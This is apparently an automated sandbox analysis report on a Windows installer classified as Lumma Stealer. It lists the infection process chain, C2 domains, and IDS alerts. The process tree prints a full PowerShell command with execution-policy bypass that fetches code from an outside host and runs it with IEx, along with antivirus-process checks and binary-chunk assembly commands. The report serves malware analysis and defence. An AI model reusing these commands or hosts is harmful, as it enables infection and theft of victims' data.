Windows
Analysis Report
Setup.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- Setup.exe (PID: 6256 cmdline:
"C:\Users\ user\Deskt op\Setup.e xe" MD5: 873F5709BF55A0AAF991044C645CF8EB) - cmd.exe (PID: 5372 cmdline:
"C:\Window s\System32 \cmd.exe" /c move Ar chive Arch ive.cmd & Archive.cm d MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6016 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 5476 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 6484 cmdline:
findstr /I "opssvc w rsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - tasklist.exe (PID: 6936 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 6276 cmdline:
findstr "A vastUI AVG UI bdservi cehost nsW scSvc ekrn SophosHea lth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 5928 cmdline:
cmd /c md 811185 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - extrac32.exe (PID: 5940 cmdline:
extrac32 / Y /E Thous and MD5: 9472AAB6390E4F1431BAA912FCFF9707) - findstr.exe (PID: 7116 cmdline:
findstr /V "makes" M akes MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 1456 cmdline:
cmd /c cop y /b 81118 5\M.com + Symbol + B ang + Sons + Prefix + Re + Ans wers + Fra nk + Chanc ellor + En able 81118 5\M.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 2676 cmdline:
cmd /c cop y /b ..\Ga ther + ..\ Intend + . .\Couple + ..\Und + ..\Desktop + ..\Labo ratories + ..\Leonar d c MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - M.com (PID: 760 cmdline:
M.com c MD5: 62D09F076E6E0240548C2F837536A46A) - powershell.exe (PID: 2312 cmdline:
powershell -exec byp ass [Net.s ervicepOIN TmANaGer]: :SEcURiTyP rOtoCOl = [Net.SecUr iTyprOtoco ltYPe]::tL s12; $gD=' https://df gh.online/ invoker.ph p?compName ='+$env:co mputername ; $pTSr = iWr -uRi $ gD -uSebAS IcpARsiNg -UsErAGent 'Mozilla/ 5.0 (Windo ws NT 10.0 ; Win64; x 64) AppleW ebKit/57.3 6 (KHTML, like Gecko ) Chrome/1 2.0.0.0 Sa fari/57.36 '; IEx $Pt sr.Content ; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 4016 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - choice.exe (PID: 6532 cmdline:
choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["yokesandusj.sbs", "tirepublicerj.shop", "wholersorie.shop", "cloudewahsj.shop", "rabidcowse.shop", "nearycrepso.shop", "abruptyopsn.shop", "framekgirus.shop", "noisycuttej.shop"], "Build id": "hRjzG3--TRON"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:43.540851+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49906 | 104.102.49.254 | 443 | TCP |
2025-01-07T14:35:44.739237+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49915 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:45.947478+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49925 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:47.088727+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49933 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:48.521002+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49942 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:49.507858+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49950 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:50.855564+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49960 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:51.996755+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49967 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:53.388322+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49978 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:55.424658+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49981 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:56.657124+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49983 | 185.161.251.21 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:45.464769+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49915 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:46.453927+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49925 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:55.881611+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49981 | 104.21.80.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:45.464769+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49915 | 104.21.80.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:46.453927+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49925 | 104.21.80.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:42.693790+0100 | 2058598 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 59418 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:42.789441+0100 | 2058606 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 56521 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:42.718754+0100 | 2058610 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 53239 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:42.674538+0100 | 2058616 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 59142 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:42.763054+0100 | 2058618 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 61941 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:42.776894+0100 | 2058622 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 51255 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:42.730971+0100 | 2058628 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 60755 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:42.707734+0100 | 2058632 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 62120 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:52.481939+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49967 | 104.21.80.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:44.141971+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49906 | 104.102.49.254 | 443 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: |
Source: | Code function: | 0_2_004062D5 | |
Source: | Code function: | 0_2_00402E18 | |
Source: | Code function: | 0_2_00406C9B |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_004050CD |
Source: | Code function: | 0_2_004044A5 |
Source: | Code function: | 0_2_00403883 |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_0040497C | |
Source: | Code function: | 0_2_00406ED2 | |
Source: | Code function: | 0_2_004074BB |
Source: | Dropped File: |
Source: | Code function: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Classification label: |
Source: | Code function: | 0_2_004044A5 |
Source: | Code function: | 0_2_004024FB |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Process created: |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Binary string: |
Data Obfuscation |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_2_004062FC |
Source: | Static PE information: |
Persistence and Installation Behavior |
---|
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
